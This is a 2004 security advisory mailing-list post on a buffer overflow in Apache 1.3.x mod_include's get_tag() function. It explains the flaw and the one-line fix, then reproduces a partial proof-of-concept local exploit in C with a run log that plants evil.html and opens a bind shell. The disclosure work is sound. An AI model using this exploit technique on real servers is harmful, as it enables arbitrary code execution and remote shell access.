Date: 25 Oct 2004 10:38:04 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] Apache Mod_include Local Buffer Overflow
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Apache Mod_include Local Buffer Overflow
Mod_include is one of Apache's standard modules which allows users to use
some features in their HTML pages such as include files, exec commands,
echo, etc.
A buffer overflow exists within mod_include can lead to code execution
when parsing HTML tags.
Vulnerable Systems:
* Apache with mod_include versions 1.3.x
The overflow exists in the get_tag() function in mod_include.c:
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int
term = c;
while (1) {
GET_CHAR(in, c, NULL, p);
[1] if (t - tag == tagbuf_len) {
*t = '\0';
return NULL;
/* Want to accept \" as a valid character within a string. */
if (c == '\\') {
[2] *(t++) = c; /* Add backslash */
GET_CHAR(in, c, NULL, p);
if (c == term) { /* Only if */
[3] *(--t) = c; /* Replace backslash ONLY for
terminator */
else if (c == term) {
[4] *(t++) = c;
*t = '\0';
The first check (labeled [1]) is used to find the end of the tag buffer.
However, the check could be skipped if conditions [2] and [4] are met at
the same time condition [3] is not. Thus, an attacker is able to craft a
malformed HTML file that overwrites a static buffer causing arbitrary code
execution to occur with privileges of the HTTP server child process.
For those wishing to fix the problem in mod_include, the following line
should be changed from:
if (t - tag == tagbuf_len) {
if (t - tag >= tagbuf_len-1) {
In the get_tag() function. Following is a proof of concept exploit for the
Proof Of Concept
local exploit for mod_include of apache 1.3.x
written by xCrZx /18.10.2004/
bug found by xCrZx /18.10.2004/
y0das old shao lin techniq ownz u :) remember my words
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)
Technical Details:
there is an overflow in get_tag function:
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int
dodecode) *
term = c;
while (1) {
GET_CHAR(in, c, NULL, p);
[1] if (t - tag == tagbuf_len) {
*t = '\0';
return NULL;
// Want to accept \" as a valid character within a string. //
if (c == '\\') {
[2] *(t++) = c; // Add backslash //
GET_CHAR(in, c, NULL, p);
if (c == term) { // Only if //
[3] *(--t) = c; // Replace backslash ONLY for
terminator // *
else if (c == term) {
[4] *(t++) = c;
*t = '\0';
as we can see there is a [1] check to determine the end of tag buffer
but this check can be skiped when [2] & [4] conditions will be occured
at the same time without [3] condition.
So attacker can create malicious file to overflow static buffer, on
which tag points out and execute arbitrary code with privilegies of
httpd child process.
[1*] if (t - tag >= tagbuf_len-1) {
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf
Example of work:
[root@blacksand htdocs]# make 85mod_include
cc 85mod_include.c -o 85mod_include
[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html
[root@blacksand htdocs]# chmod +x evil.html
[root@blacksand htdocs]# netstat -na|grep 52986
[root@blacksand htdocs]# telnet localhost 8080
Connected to localhost.
Escape character is '^]'.
GET /evil.html HTTP/1.0
telnet> q
Connection closed.
[root@blacksand htdocs]# netstat -na|grep 52986
tcp 0 0*
[root@blacksand htdocs]#
Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always
Personal hello to my parents :)
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define EVILBUF 8202
#define HTMLTEXT 1000
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by
xCrZx /18.10.2004/ ***\n"
int main(int argc, char **argv) {
char evilbuf[EVILBUF+1];
//can be changed
char shellcode[] =
// bind shell on 52986 port
//execve /tmp/sh <- your own program
char NOP[] = "\x90\x40"; // special nops ;)
char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)
int padding,xpad=0;
int i,fd;
long ret=0xbfff8688;
if(argc>1) ret=strtoul(argv[1],0,16);
else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> >
file.html\n\n",argv[0]);exit(0); }
while(1) {
if(padding%2==0) { padding/=2; break;}
else {padding--;xpad++;}
memset(html,0x0,sizeof html);
memset(evilbuf,0x0,sizeof evilbuf);
memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
return 0;
The information has been provided by <mailto:[email protected]>
Crazy Einstein.
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